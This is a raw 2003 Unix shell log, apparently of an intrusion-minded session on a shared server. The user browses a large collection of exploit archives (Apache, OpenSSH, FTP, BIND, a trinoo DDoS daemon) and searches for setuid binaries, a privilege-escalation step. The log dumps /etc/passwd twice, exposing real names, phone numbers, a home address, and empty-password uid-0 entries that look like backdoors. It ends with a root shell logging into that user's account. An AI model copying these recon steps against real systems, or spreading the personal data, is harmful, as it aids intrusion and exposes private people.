tsao@cia public_html $ haha
-bash: haha: command not found
tsao@cia public_html $ ls
apache/ cc1.tgz scan.c teso.tar wixhack.txt x2/
blah/ orderexports/ sxscannerv2.zip transactions.doc wwwscan.c
tsao@cia public_html $ uname -a;id
Linux cia.zemos.net 2.4.20 #1 Thu Feb 13 19:43:01 PST 2003 i686 unknown unknown GNU/Linux
uid=10794(tsao) gid=100(users) groups=100(users)
tsao@cia public_html $ w
17:45:59 up 19 days, 19:30, 7 users, load average: 0.09, 0.12, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia public_html $ ls
apache/ cc1.tgz scan.c teso.tar wixhack.txt x2/
blah/ orderexports/ sxscannerv2.zip transactions.doc wwwscan.c
tsao@cia public_html $ ls apache
7350-apache* IG-Apache.c* apache-coolio.c* apache_php.c* apache~3.c*
7350-apache.bin* IG-Apache.c.txt* apache-linux.c* apache~1.spk* es-packer.c*
ADMapache.c* apache* apache-scalp.c* apache~1.zip*
tsao@cia public_html $ ls
apache/ cc1.tgz scan.c teso.tar wixhack.txt x2/
blah/ orderexports/ sxscannerv2.zip transactions.doc wwwscan.c
tsao@cia public_html $ ls blah
0day/ arkd00r.tgz* massirix.tgz openssl-too-open.tar.gz php0day.pl private/ rw.zip targets.319.txt
tsao@cia public_html $ cd blah
tsao@cia blah $ ls
0day/ arkd00r.tgz* massirix.tgz openssl-too-open.tar.gz php0day.pl private/ rw.zip targets.319.txt
tsao@cia blah $ ls 0*
0x3a0x29bof.c* b00.c* ptnew*
0x3a0x29dccsteal.c* badboy.c* ptrace-moo0.c*
0x3a0x29hldecrypt.c* bang2.c* pureftpd.c*
0x3a0x29initpatch.c* bind.c* raq4lrex.sh*
0x3a0x29links2iplist.c* bind9.c* rdevx.c*
0x3a0x29nrs.c* bind9eko.c* redman.c*
0x3a0x29pidbrute.c* bnc4all-beta-a.c* remorse.tar*
0x3a0x29rpc.c* cd00r.c* remorse.tgz*
0x3a0x29snmp.c* cfingerd.c* slack.c*
7350apac* cisco677.perl* slice.c*
7350pppdx.perl* clean.c* snmp_rh.c*
7350wurm* ewps.c* solaris.c*
CRC69hackalot.c* fbsd_io.c* squid-prelim.perl*
ESat.c* g0thead* sshd.tar.gz*
GOBBLES-own-ettercap-irc.c* imap4rev1.c* super-sadmin.c*
GOBBLES-own-ettercap.c* index.html* telnet.c*
GOBBLES-own-nsmail.sh* ippp.c* telnetd*
GOBBLES-own-runas.sh* ircdhijacker.c* telnetd-scanner.c*
GOBBLES-own-screen.c* lameidentd-exp.c* telnetd.c*
GOBBLES-own-wmcube-gdk.c* list* telnetd.tar.gz*
IG-apache.c* namedexploit.c* unzip.c*
OpenSSHxNEW.tar* newapache.tar* wu2-6-1/
aixploit.c* ns.c* wuftpd-2.6.2/
alpd.c* omniback.c* x2auto.tar.gz*
apa-longslash.perl* openssh-2.2.0-exp.tgz* x2src.tar.gz*
apache-linux* openssl-too-open1.c* x3haxor.tgz*
apache-linux.c* osshchan_OpenSSH_2.9p1-2.tgz* x4.tar*
apache-nosejob.c* osshchan_OpenSSH_3.0.2.tar* x4.tgz*
apache-scalp.c* own-jidentd.c* x6/
apache3.perl* ownssl.c* x_php_for_php.4.1.2.c*
apache_1.3.2_ssl_1.47.tar.gz* phpspl.c* xssh.tgz*
apache_1.3.4_ssl_1.30.tar.gz* phpxpl.c* xwall.s*
apachebd.tgz* pre4.c* yonzisolaris.c*
apachex/ pstrace.c*
tsao@cia blah $ cd 0*
tsao@cia 0day $ ./7350apac
Segmentation fault
tsao@cia 0day $ ls
0x3a0x29bof.c* b00.c* ptnew*
0x3a0x29dccsteal.c* badboy.c* ptrace-moo0.c*
0x3a0x29hldecrypt.c* bang2.c* pureftpd.c*
0x3a0x29initpatch.c* bind.c* raq4lrex.sh*
0x3a0x29links2iplist.c* bind9.c* rdevx.c*
0x3a0x29nrs.c* bind9eko.c* redman.c*
0x3a0x29pidbrute.c* bnc4all-beta-a.c* remorse.tar*
0x3a0x29rpc.c* cd00r.c* remorse.tgz*
0x3a0x29snmp.c* cfingerd.c* slack.c*
7350apac* cisco677.perl* slice.c*
7350pppdx.perl* clean.c* snmp_rh.c*
7350wurm* ewps.c* solaris.c*
CRC69hackalot.c* fbsd_io.c* squid-prelim.perl*
ESat.c* g0thead* sshd.tar.gz*
GOBBLES-own-ettercap-irc.c* imap4rev1.c* super-sadmin.c*
GOBBLES-own-ettercap.c* index.html* telnet.c*
GOBBLES-own-nsmail.sh* ippp.c* telnetd*
GOBBLES-own-runas.sh* ircdhijacker.c* telnetd-scanner.c*
GOBBLES-own-screen.c* lameidentd-exp.c* telnetd.c*
GOBBLES-own-wmcube-gdk.c* list* telnetd.tar.gz*
IG-apache.c* namedexploit.c* unzip.c*
OpenSSHxNEW.tar* newapache.tar* wu2-6-1/
aixploit.c* ns.c* wuftpd-2.6.2/
alpd.c* omniback.c* x2auto.tar.gz*
apa-longslash.perl* openssh-2.2.0-exp.tgz* x2src.tar.gz*
apache-linux* openssl-too-open1.c* x3haxor.tgz*
apache-linux.c* osshchan_OpenSSH_2.9p1-2.tgz* x4.tar*
apache-nosejob.c* osshchan_OpenSSH_3.0.2.tar* x4.tgz*
apache-scalp.c* own-jidentd.c* x6/
apache3.perl* ownssl.c* x_php_for_php.4.1.2.c*
apache_1.3.2_ssl_1.47.tar.gz* phpspl.c* xssh.tgz*
apache_1.3.4_ssl_1.30.tar.gz* phpxpl.c* xwall.s*
apachebd.tgz* pre4.c* yonzisolaris.c*
apachex/ pstrace.c*
tsao@cia 0day $ head ns.c
/* trinoo daemon */
#include
#include
#include
#include
#include
#include
#include
#include
tsao@cia 0day $ uname -a
Linux cia.zemos.net 2.4.20 #1 Thu Feb 13 19:43:01 PST 2003 i686 unknown unknown GNU/Linux
tsao@cia 0day $ id
uid=10794(tsao) gid=100(users) groups=100(users)
tsao@cia 0day $ w
17:52:23 up 19 days, 19:36, 7 users, load average: 0.30, 0.21, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia 0day $ ls
0x3a0x29bof.c* b00.c* ptnew*
0x3a0x29dccsteal.c* badboy.c* ptrace-moo0.c*
0x3a0x29hldecrypt.c* bang2.c* pureftpd.c*
0x3a0x29initpatch.c* bind.c* raq4lrex.sh*
0x3a0x29links2iplist.c* bind9.c* rdevx.c*
0x3a0x29nrs.c* bind9eko.c* redman.c*
0x3a0x29pidbrute.c* bnc4all-beta-a.c* remorse.tar*
0x3a0x29rpc.c* cd00r.c* remorse.tgz*
0x3a0x29snmp.c* cfingerd.c* slack.c*
7350apac* cisco677.perl* slice.c*
7350pppdx.perl* clean.c* snmp_rh.c*
7350wurm* ewps.c* solaris.c*
CRC69hackalot.c* fbsd_io.c* squid-prelim.perl*
ESat.c* g0thead* sshd.tar.gz*
GOBBLES-own-ettercap-irc.c* imap4rev1.c* super-sadmin.c*
GOBBLES-own-ettercap.c* index.html* telnet.c*
GOBBLES-own-nsmail.sh* ippp.c* telnetd*
GOBBLES-own-runas.sh* ircdhijacker.c* telnetd-scanner.c*
GOBBLES-own-screen.c* lameidentd-exp.c* telnetd.c*
GOBBLES-own-wmcube-gdk.c* list* telnetd.tar.gz*
IG-apache.c* namedexploit.c* unzip.c*
OpenSSHxNEW.tar* newapache.tar* wu2-6-1/
aixploit.c* ns.c* wuftpd-2.6.2/
alpd.c* omniback.c* x2auto.tar.gz*
apa-longslash.perl* openssh-2.2.0-exp.tgz* x2src.tar.gz*
apache-linux* openssl-too-open1.c* x3haxor.tgz*
apache-linux.c* osshchan_OpenSSH_2.9p1-2.tgz* x4.tar*
apache-nosejob.c* osshchan_OpenSSH_3.0.2.tar* x4.tgz*
apache-scalp.c* own-jidentd.c* x6/
apache3.perl* ownssl.c* x_php_for_php.4.1.2.c*
apache_1.3.2_ssl_1.47.tar.gz* phpspl.c* xssh.tgz*
apache_1.3.4_ssl_1.30.tar.gz* phpxpl.c* xwall.s*
apachebd.tgz* pre4.c* yonzisolaris.c*
apachex/ pstrace.c*
tsao@cia 0day $ head pre4.c
/*
ProFTPD 1.2pre4 Remote Buffer Overflow Xploit
by wildcoyote@coders-pt.org
Advisorie (from www.securityfocus.com):
The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable
buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c.
The vulnerability in -> 1.2pre4 <- is a mkdir overflow. The name of the created
tsao@cia 0day $
tsao@cia 0day $
tsao@cia 0day $ w
18:06:36 up 19 days, 19:50, 7 users, load average: 0.20, 0.26, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia 0day $ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
tsao 20490 0.0 0.9 5448 1244 ? S 17:37 0:00 sshd
tsao 20492 0.0 1.0 2256 1340 pts/0 S 17:37 0:00 -bash
tsao 22509 0.0 1.2 3428 1536 pts/0 R 18:06 0:00 ps aux
tsao@cia 0day $ w
18:06:40 up 19 days, 19:50, 7 users, load average: 0.20, 0.26, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia 0day $ id
uid=10794(tsao) gid=100(users) groups=100(users)
tsao@cia 0day $ uname -a
Linux cia.zemos.net 2.4.20 #1 Thu Feb 13 19:43:01 PST 2003 i686 unknown unknown GNU/Linux
tsao@cia 0day $
Message from Talk_Daemon@cia.zemos.net at 18:06 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:07 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
tsao@cia 0day $ id
uid=10794(tsao) gid=100(users) groups=100(users)
tsao@cia 0day $
Message from Talk_Daemon@cia.zemos.net at 18:07 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:08 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:08 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
tsao@cia 0day $ talk root@unixclan.net
[Connection established]
sup
tsao@cia 0day $ 18:10:58 up 19 days, 19:55, 7 users, load average: 0.12, 0.20, 0.18
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqUSER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia 0day $ 18:10:59 up 19 days, 19:55, 7 users, load average: 0.12, 0.20, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia 0day $
tsao@cia 0day $ 0x3a0x29bof.c* b00.c* ptnew*
0x3a0x29dccsteal.c* badboy.c* ptrace-moo0.c*
0x3a0x29hldecrypt.c* bang2.c* pureftpd.c*
0x3a0x29initpatch.c* bind.c* raq4lrex.sh*
0x3a0x29links2iplist.c* bind9.c* rdevx.c*
0x3a0x29nrs.c* bind9eko.c* redman.c*
0x3a0x29pidbrute.c* bnc4all-beta-a.c* remorse.tar*
0x3a0x29rpc.c* cd00r.c* remorse.tgz*
0x3a0x29snmp.c* cfingerd.c* slack.c*
7350apac* cisco677.perl* slice.c*
7350pppdx.perl* clean.c* snmp_rh.c*
7350wurm* ewps.c* solaris.c*
CRC69hackalot.c* fbsd_io.c* squid-prelim.perl*
ESat.c* g0thead* sshd.tar.gz*
GOBBLES-own-ettercap-irc.c* imap4rev1.c* super-sadmin.c*
GOBBLES-own-ettercap.c* index.html* telnet.c*
GOBBLES-own-nsmail.sh* ippp.c* telnetd*
GOBBLES-own-runas.sh* ircdhijacker.c* telnetd-scanner.c*
GOBBLES-own-screen.c* lameidentd-exp.c* telnetd.c*
GOBBLES-own-wmcube-gdk.c* list* telnetd.tar.gz*
IG-apache.c* namedexploit.c* unzip.c*
OpenSSHxNEW.tar* newapache.tar* wu2-6-1/
aixploit.c* ns.c* wuftpd-2.6.2/
alpd.c* omniback.c* x2auto.tar.gz*
apa-longslash.perl* openssh-2.2.0-exp.tgz* x2src.tar.gz*
apache-linux* openssl-too-open1.c* x3haxor.tgz*
apache-linux.c* osshchan_OpenSSH_2.9p1-2.tgz* x4.tar*
apache-nosejob.c* osshchan_OpenSSH_3.0.2.tar* x4.tgz*
apache-scalp.c* own-jidentd.c* x6/
apache3.perl* ownssl.c* x_php_for_php.4.1.2.c*
apache_1.3.2_ssl_1.47.tar.gz* phpspl.c* xssh.tgz*
apache_1.3.4_ssl_1.30.tar.gz* phpxpl.c* xwall.s*
apachebd.tgz* pre4.c* yonzisolaris.c*
apachex/ pstrace.c*
tsao@cia 0day $ logout
Connection to unixclan.net closed.
You have mail in /var/spool/mail/root
bash-2.04# ssh -l tsao unixclan.net
tsao@unixclan.net's password:
Last login: Wed Mar 5 18:10:47 2003 from 217.114.163.68
Linux 2.4.20.
WELCOME TO THE CIA.ZEMOS.NET / UNIXCLAN.NET SERVER, PART OF THE
ZEMOS NETWORK. ENJOY YOUR STAY.
UNAUTHORIZED ACCESS IS HIGHLY PROHIBITED. THIS SYSTEM IS FOR AUTHORIZED
USERS ONLY. EXPECT NO PRIVACY ON THIS SYSTEM. USING THIS SYSTEM
FOR CRIMINAL/ILLICIT/ILLEGAL ACTIVITIES TO OR FROM THIS MACHINE WILL
RESULT IN FEDERAL PROSECUTION.
Feb. 17, 2003: Installed libsafe.
Feb. 15, 2003: Updated mail system. Qmail is super stable now.
POP3 server setup (mail.unixclan.net or cia.zemos.net)
Switched to Maildir, a more stable method of mail.
"...A strange enigma is man!"
"Someone calls him a soul concealed in an animal," I suggested.
"Winwood Reade is good upon the subject," said Holmes. "He remarked
that, while the individual man is an insoluble puzzle, in the aggregate he
becomes a mathematical certainty. You can, for example, never foretell what
any one man will do, but you can say with precision what an average number
will be up to. Individuals vary, but percentages remain constant. So says
the statistician."
-- Sherlock Holmes, "The Sign of Four"
tsao@cia tsao $ w
18:11:13 up 19 days, 19:55, 7 users, load average: 0.16, 0.21, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia tsao $ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
tsao 22827 0.6 0.9 5316 1184 ? S 18:11 0:00 sshd
tsao 22828 1.0 1.0 2248 1308 pts/0 S 18:11 0:00 -bash
tsao 22845 0.0 1.2 3428 1536 pts/0 R 18:11 0:00 ps aux
tsao@cia tsao $ id
uid=10794(tsao) gid=100(users) groups=100(users)
tsao@cia tsao $ uname -a
Linux cia.zemos.net 2.4.20 #1 Thu Feb 13 19:43:01 PST 2003 i686 unknown unknown GNU/Linux
tsao@cia tsao $ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
nobody:x:99:99:nobody:/dev/null:/bin/false
booterr:x:1000:113:Josh Bendetto,,,:/home/booterr:/bin/bash
mike:x:1001:113:Mike Stevens,,,:/home/mike:/bin/bash
mikecc:x:1002:113:mike cramp,,858-695-1155,:/home/mikecc:/bin/bash
root-mc:x:0:0:,,,:/root:/bin/bash
root-ms:x:0:0:,,,:/root:/bin/bash
drdos:x:1003:100:,,,:/home/drdos:/bin/bash
jason:x:1004:114:Jason Evan Volk,,dont know yet,1-973-564-6456:/home/jason:/bin/bash
the1:x:1006:100:,,,:/home/the1:/bin/bash
copperd:x:1007:113:,,,:/home/copperd:/bin/bash
moke:x:1008:100:,,,:/home/moke:/bin/bash
gvs:x:1009:100:Gorik Van Steenberge,,,:/home/gvs:/bin/bash
mysql:x:1011:100:,,,:/var/lib/mysql:/bin/false
alias:x:1012:102::/var/qmail/alias:/bin/false
qmaild:x:1013:102::/var/qmail:/bin/false
qmaill:x:1014:102::/var/qmail:/bin/false
qmailp:x:1015:102::/var/qmail:/bin/false
qmailq:x:1016:103::/var/qmail:/bin/false
qmailr:x:1017:103::/var/qmail:/bin/false
qmails:x:1018:103::/var/qmail:/bin/false
ircd:x:39:39:,,,:/usr/ircd:/bin/bash
sshd:x:33:33:sshd:/:
ph33r:x:1022:100:,,,:/home/ph33r:/bin/bash
gamez:x:1024:100:,,,:/home/gamez:/bin/bash
pop:x:90:90:POP:/:
fazer:x:1033:100:Fazer,2287 Cherrypost Drive. Toronto Ontario CANADA,(416) 833-9804,N/A:/home/fazer:/bin/bash
unreal:x:1036:100:,,,:/www/gzwww/:/bin/bash
datachild:x:1037:100:,,,:/home/datachild:/bin/bash
chaoko:x:1038:100:,,,:/www/chaokoww:/bin/bash
overlord:x:1039:100:George Jiang,,,:/home/overlord:/bin/bash
seven11:x:1040:100:,,,:/home/seven11:/bin/bash
raky:x:1041:100:John Cambell,,,22564879:/home/raky:/bin/bash
zemo:x:1042:100:,,,:/home/zemo:/bin/bash
hfx:x:1043:100:,,,:/home/hfx:/bin/bash
justin:x:1048:100:justin,69,696969696969,69696969696969:/www/dmcawww:/bin/bash
ilya:x:1050:100:Ilya Imas,,,858-243-2689:/home/ilya:/bin/bash
dumbuser:x:1054:100::/dev/null:/bin/bash
xsamri:x:1055:113:,,,:/home/xsamri:/bin/bash
cydo:x:1062:100:,,,:/home/cydo:/bin/bash
immortal:x:1064:100:Damien Christensen,420,420-781-3166,420-781-3167:/home/immortal:/bin/csh
s0kket:x:1065:100:,,,:/home/s0kket:/bin/bash
root-jv:x:0:0:,,,:/home/jason:/bin/bash
shazam:x:1066:100:,,,:/home/shazam:/bin/bash
rtcw:x:1067:100:,,,:/www/rtcw:/bin/bash
th0r:x:1068:100:,,,:/home/th0r:/bin/bash
dark:x:1069:100:,,,:/www/darkwww:/bin/bash
df:x:1071:100:,,,:/home/df:/bin/bash
akcess:x:1073:100:John Falkner,,,646-09-345-5289:/home/akcess:/bin/bash
millenix:x:1074:100:,,,:/home/millenix:/bin/bash
drew:x:1075:100:,,,:/home/drew:/bin/bash
dis:x:1076:100:Apos T Asia,78,902 103 1067,918 612 6483:/home/dis:/bin/bash
s4rin:x:1077:100:s4rin,203,,:/home/s4rin:/bin/bash
mercy:x:10780:100:mercy,mercy,mercy,mrecy:/home/mercy:/bin/bash
skuddmuffin:x:1079:100:Tim Garrison,1,(765)772-9112,(219)866-0702:/home/skuddmuffin:/bin/bash
ctk:x:10783:100:Ted Chong,Singapore,+65.63801260,+65.67601223:/home/ctk:/bin/bash
zpush:x:10784:100::/var/zpush:/bin/bash
tri0:x:10785:100:,,,:/home/tri0:/bin/bash
rave:x:10786:100:,,,:/home/rave:/bin/bash
pr0digy:x:10787:100:,,,:/home/pr0digy:/bin/bash
pop1::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
pop3::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
pop1::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
pop3::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
matrix:x:10788:100:,,,:/home/matrix:/bin/bash
ralph:x:10789:100:,,,:/home/ralph:/bin/bash
chmod_:x:10791:100:Paul-Kr. Hamre,2003,555-elite,555-h0m3:/home/chmod_:/bin/bash
notrace:x:10792:100:,,,:/home/notrace:/bin/bash
power:x:10793:100:,,,:/home/power:/bin/bash
tsao:x:10794:100:,,,:/home/tsao:/bin/bash
ztod:x:10795:100:,,,:/home/ztod:/bin/bash
nxeo:x:10796:100:,,,:/home/nxeo:/bin/bash
s1n:x:10797:100:,,,:/home/s1n:/bin/bash
tsao@cia tsao $
Message from Talk_Daemon@cia.zemos.net at 18:11 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:11 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:12 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:12 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:13 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
Message from Talk_Daemon@cia.zemos.net at 18:15 ...
talk: connection requested by root@unixclan.net.
talk: respond with: talk root@unixclan.net
w
18:18:12 up 19 days, 20:02, 7 users, load average: 0.32, 0.29, 0.21
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tsao@cia tsao $ ls /
bin/ boot/ dev/ etc/ hack/ home/ lib/ lost+found/ mnt/ proc/ root/ sbin/ tmp/ usr/ var/ www/
tsao@cia tsao $ cat /etc/*rele*
cat: /etc/*rele*: No such file or directory
tsao@cia tsao $ cat /etc/issue
Welcome to \s \r (\l)
tsao@cia tsao $ pwd
/home/tsao
tsao@cia tsao $ find / -type f -perm -4000 > z &
[1] 23824
tsao@cia tsao $ find: /lost+found: Permission denied
find: /usr/lost+found: Permission denied
find: /usr/local/etc/tmp: Permission denied
[1]+ Exit 1 find / -type f -perm -4000 >z
tsao@cia tsao $ cat z
/usr/bin/crontab
/usr/bin/fdmount
/usr/bin/chage
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/expiry
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sperl5.6.1
/usr/bin/rcp
/usr/bin/rsh
/usr/bin/rlogin
/usr/bin/traceroute
/usr/bin/procmail
/usr/bin/sudo
/usr/local/bin/su
/usr/local/libexec/ssh-keysign
/usr/libexec/pt_chown
/var/qmail/bin/qmail-queue
/bin/su
/bin/mount
/bin/umount
/bin/ping
/sbin/unix_chkpwd
/tmp/1
tsao@cia tsao $ ls -al /tmp
total 27828
drwxrwxrwt 3 root root 4096 Mar 5 18:15 ./
drwxr-xr-x 18 root root 4096 Feb 27 18:41 ../
-rw-rw-rw- 1 jason root 5 Nov 17 22:39 .303.3ed15
-rw-rw-rw- 1 fazer users 5 Feb 2 19:27 .801.7b095
-rw-r--r-- 1 1019 users 108 Jan 3 12:11 .Configtmp18496.c
-rw-r--r-- 1 nobody nobody 0 Feb 14 20:27 0wned-res
-rwsr-sr-x 1 mercy users 13443 Feb 24 12:45 1*
-rw-r--r-- 1 jason millenix 3653002 Mar 3 16:21 Balearic\ Bill\ -\ Destination\ Sunshine.mp3
-rw-r--r-- 1 jason millenix 8668596 Mar 3 15:49 Chicane\ -\ Behind\ The\ Sun\ -\ Halcyon.mp3
-rw-r--r-- 1 jason millenix 7802884 Feb 15 20:12 Hairy\ Blonde\ Pussy,\ Female\ Ejaculation.mpeg
-rw-r--r-- 1 mercy users 540 Feb 23 00:22 IsIt.c
-rw-r--r-- 1 jason millenix 2985943 Feb 14 20:15 System\ of\ a\ down\ -\ Forest.mp3
drwxr-xr-x 2 nobody root 4096 Mar 5 00:18 ZController/
-rw-r--r-- 1 jason millenix 4773930 Feb 23 13:39 [mindlezz-entertainment.cjb.net]08_-_Dj_Jimmy_K_v2_-_Track_08.mp3
-rw-r--r-- 1 mercy users 497098 Feb 24 02:06 index.html
-rw-r--r-- 1 root root 1160 Dec 13 18:58 linkhead.php
tsao@cia tsao $ uname -a;
Linux cia.zemos.net 2.4.20 #1 Thu Feb 13 19:43:01 PST 2003 i686 unknown unknown GNU/Linux
tsao@cia tsao $ id
uid=10794(tsao) gid=100(users) groups=100(users)
tsao@cia tsao $ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
nobody:x:99:99:nobody:/dev/null:/bin/false
booterr:x:1000:113:Josh Bendetto,,,:/home/booterr:/bin/bash
mike:x:1001:113:Mike Stevens,,,:/home/mike:/bin/bash
mikecc:x:1002:113:mike cramp,,858-695-1155,:/home/mikecc:/bin/bash
root-mc:x:0:0:,,,:/root:/bin/bash
root-ms:x:0:0:,,,:/root:/bin/bash
drdos:x:1003:100:,,,:/home/drdos:/bin/bash
jason:x:1004:114:Jason Evan Volk,,dont know yet,1-973-564-6456:/home/jason:/bin/bash
the1:x:1006:100:,,,:/home/the1:/bin/bash
copperd:x:1007:113:,,,:/home/copperd:/bin/bash
moke:x:1008:100:,,,:/home/moke:/bin/bash
gvs:x:1009:100:Gorik Van Steenberge,,,:/home/gvs:/bin/bash
mysql:x:1011:100:,,,:/var/lib/mysql:/bin/false
alias:x:1012:102::/var/qmail/alias:/bin/false
qmaild:x:1013:102::/var/qmail:/bin/false
qmaill:x:1014:102::/var/qmail:/bin/false
qmailp:x:1015:102::/var/qmail:/bin/false
qmailq:x:1016:103::/var/qmail:/bin/false
qmailr:x:1017:103::/var/qmail:/bin/false
qmails:x:1018:103::/var/qmail:/bin/false
ircd:x:39:39:,,,:/usr/ircd:/bin/bash
sshd:x:33:33:sshd:/:
ph33r:x:1022:100:,,,:/home/ph33r:/bin/bash
gamez:x:1024:100:,,,:/home/gamez:/bin/bash
pop:x:90:90:POP:/:
fazer:x:1033:100:Fazer,2287 Cherrypost Drive. Toronto Ontario CANADA,(416) 833-9804,N/A:/home/fazer:/bin/bash
unreal:x:1036:100:,,,:/www/gzwww/:/bin/bash
datachild:x:1037:100:,,,:/home/datachild:/bin/bash
chaoko:x:1038:100:,,,:/www/chaokoww:/bin/bash
overlord:x:1039:100:George Jiang,,,:/home/overlord:/bin/bash
seven11:x:1040:100:,,,:/home/seven11:/bin/bash
raky:x:1041:100:John Cambell,,,22564879:/home/raky:/bin/bash
zemo:x:1042:100:,,,:/home/zemo:/bin/bash
hfx:x:1043:100:,,,:/home/hfx:/bin/bash
justin:x:1048:100:justin,69,696969696969,69696969696969:/www/dmcawww:/bin/bash
ilya:x:1050:100:Ilya Imas,,,858-243-2689:/home/ilya:/bin/bash
dumbuser:x:1054:100::/dev/null:/bin/bash
xsamri:x:1055:113:,,,:/home/xsamri:/bin/bash
cydo:x:1062:100:,,,:/home/cydo:/bin/bash
immortal:x:1064:100:Damien Christensen,420,420-781-3166,420-781-3167:/home/immortal:/bin/csh
s0kket:x:1065:100:,,,:/home/s0kket:/bin/bash
root-jv:x:0:0:,,,:/home/jason:/bin/bash
shazam:x:1066:100:,,,:/home/shazam:/bin/bash
rtcw:x:1067:100:,,,:/www/rtcw:/bin/bash
th0r:x:1068:100:,,,:/home/th0r:/bin/bash
dark:x:1069:100:,,,:/www/darkwww:/bin/bash
df:x:1071:100:,,,:/home/df:/bin/bash
akcess:x:1073:100:John Falkner,,,646-09-345-5289:/home/akcess:/bin/bash
millenix:x:1074:100:,,,:/home/millenix:/bin/bash
drew:x:1075:100:,,,:/home/drew:/bin/bash
dis:x:1076:100:Apos T Asia,78,902 103 1067,918 612 6483:/home/dis:/bin/bash
s4rin:x:1077:100:s4rin,203,,:/home/s4rin:/bin/bash
mercy:x:10780:100:mercy,mercy,mercy,mrecy:/home/mercy:/bin/bash
skuddmuffin:x:1079:100:Tim Garrison,1,(765)772-9112,(219)866-0702:/home/skuddmuffin:/bin/bash
ctk:x:10783:100:Ted Chong,Singapore,+65.63801260,+65.67601223:/home/ctk:/bin/bash
zpush:x:10784:100::/var/zpush:/bin/bash
tri0:x:10785:100:,,,:/home/tri0:/bin/bash
rave:x:10786:100:,,,:/home/rave:/bin/bash
pr0digy:x:10787:100:,,,:/home/pr0digy:/bin/bash
pop1::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
pop3::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
pop1::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
pop3::1212:1212:::/bin/sh
pop33::0:0:::/bin/sh
matrix:x:10788:100:,,,:/home/matrix:/bin/bash
ralph:x:10789:100:,,,:/home/ralph:/bin/bash
chmod_:x:10791:100:Paul-Kr. Hamre,2003,555-elite,555-h0m3:/home/chmod_:/bin/bash
notrace:x:10792:100:,,,:/home/notrace:/bin/bash
power:x:10793:100:,,,:/home/power:/bin/bash
tsao:x:10794:100:,,,:/home/tsao:/bin/bash
ztod:x:10795:100:,,,:/home/ztod:/bin/bash
nxeo:x:10796:100:,,,:/home/nxeo:/bin/bash
s1n:x:10797:100:,,,:/home/s1n:/bin/bash
tsao@cia tsao $
tsao@cia home $ ls
akcess/ cydo/ drdos/ hfx/ matrix/ moke/ ph33r/ rave/ shazam/ tsao/
booterr/ darkarchon/ drew/ ilya/ mercy/ mysql/ power/ s0kket/ skuddmuffin/ xsamri/
chmod_/ datachild/ fazer/ immortal/ mike/ notrace/ pr0digy/ s1n/ th0r/ zemo/
copperd/ df/ gamez/ jason/ mikecc/ nxeo/ raky/ s4rin/ the1/ ztod/
ctk/ dis/ gvs/ lost+found/ millenix/ overlord/ ralph/ seven11/ tri0/
tsao@cia home $ cd tsao
